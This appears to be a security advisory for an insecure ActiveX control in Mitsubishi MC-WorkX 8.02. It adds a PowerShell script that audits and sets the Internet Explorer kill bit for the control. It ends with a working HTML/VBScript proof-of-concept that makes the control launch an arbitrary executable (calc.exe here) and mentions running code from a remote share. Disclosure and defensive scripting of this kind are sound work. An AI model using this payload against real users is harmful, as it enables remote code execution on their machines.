Vendor: MC-WorkX
By: Blake
CVSS: 8,8 (HIGH)
Insecure ActiveX Control
CWE: 284
Product Name: MC-WorkX
Affected Version From: MC-WorkX 8.02
Affected Version To: MC-WorkX 8.02
Patch Exists: NO
Related CWE: N/A
CPE: a:mitsubishi_electric_automation:mc-workx:8.02
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 / IE 6
2020

Mitsubishi MC-WorkX Suite Insecure ActiveX Control (IcoLaunch)

This proof of concept will launch an arbitrary executable when the Login Client button is clicked. An attacker could use this to have the victim launch malicious code from a remote share. Calc is used in this example.

Mitigation:

Disable ActiveX controls in the browser settings or use a browser that does not support ActiveX.
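
The PoC header below lists the control as "Kill Bit: False". The following PowerShell script is an added example, not part of the original advisory or the vendor's guidance: it reports the Internet Explorer kill-bit state for the IcoLaunch CLSID and, with -Apply, sets it. It assumes the standard IE "ActiveX Compatibility" registry location and the standard safe-for-scripting and safe-for-initialization category IDs; only the CLSID comes from this page.

```powershell
# Added example (not from the advisory): audit / set the IE kill bit for IcoLaunch.
# Run elevated. Pass -Apply to write the kill bit; the default is report-only.
param([switch]$Apply)

$Clsid   = '{C28A127E-4A85-11D3-A5FF-00A0249E352D}'   # CLSID from the advisory
$KillBit = 0x400                                      # kill-bit value in "Compatibility Flags"
$Roots   = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
) | Where-Object { Test-Path (Split-Path $_ -Parent) }   # 32-bit view exists only on 64-bit Windows

function Get-CompatFlags([string]$Key) {
    # Returns the current DWORD, or 0 when the key or value is absent.
    if (-not (Test-Path $Key)) { return 0 }
    $p = Get-ItemProperty -Path $Key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($p) { return [int]$p.'Compatibility Flags' }
    return 0
}

foreach ($root in $Roots) {
    $key   = Join-Path $root $Clsid
    $flags = Get-CompatFlags $key
    if ($Apply -and (($flags -band $KillBit) -eq 0)) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        # OR the bit in so any other compatibility flags already present are preserved.
        New-ItemProperty -Path $key -Name 'Compatibility Flags' -PropertyType DWord `
            -Value ($flags -bor $KillBit) -Force | Out-Null
        $flags = Get-CompatFlags $key
    }
    'Kill bit set: {0,-5}  flags=0x{1:X8}  {2}' -f (($flags -band $KillBit) -ne 0), $flags, $key
}

# Report whether the control is registered and marked safe via component categories.
# A control can also assert safety through IObjectSafety, so "False" here is not conclusive.
$clsKey = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
$cats = @{
    'Safe for scripting' = '{7DD95801-9882-11CF-9FA9-00AA006C4A69}'
    'Safe for init'      = '{7DD95802-9882-11CF-9FA9-00AA006C4A69}'
}
'Control registered: {0}' -f (Test-Path $clsKey)
foreach ($name in $cats.Keys) {
    '{0}: {1}' -f $name, (Test-Path "$clsKey\Implemented Categories\$($cats[$name])")
}
```

Once the kill bit is set, Internet Explorer refuses to instantiate the control from a web page, independent of the browser-wide ActiveX settings.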

Exploit-DB raw data:

<html>
<object classid='clsid:C28A127E-4A85-11D3-A5FF-00A0249E352D' id='target'></object>
<!--
Mitsubishi MC-WorkX Suite Insecure ActiveX Control - IcoLaunch.dll
Vendor: http://www.meau.com
Version: MC-WorkX 8.02
Tested on: Windows XP SP3 / IE 6
Download: http://www.meau.com/functions/dms/getfile.asp?ID=035000000000000001000000908800000
Author: Blake

CLSID: C28A127E-4A85-11D3-A5FF-00A0249E352D
ProgId: ICOLAUNCHLib.LaunchCtl
Path: C:\Program Files\Mitsubishi Electric Automation\MC-WorX\Bin\IcoLaunch.dll
MemberName: FileName
Safe for scripting: True
Safe for init: True
Kill Bit: False
-->

<title>Mitsubishi MC-WorkX Suite Insecure ActiveX Control (IcoLaunch)</title>
<p>This proof of concept will launch an arbitrary executable when the Login Client button is clicked. An attacker could use this to have the victim launch malicious code from a remote share. Calc is used in this example.</p>

<script language='vbscript'>
file="C:\\WINDOWS\\system32\\calc.exe"
target.FileName = file
</script>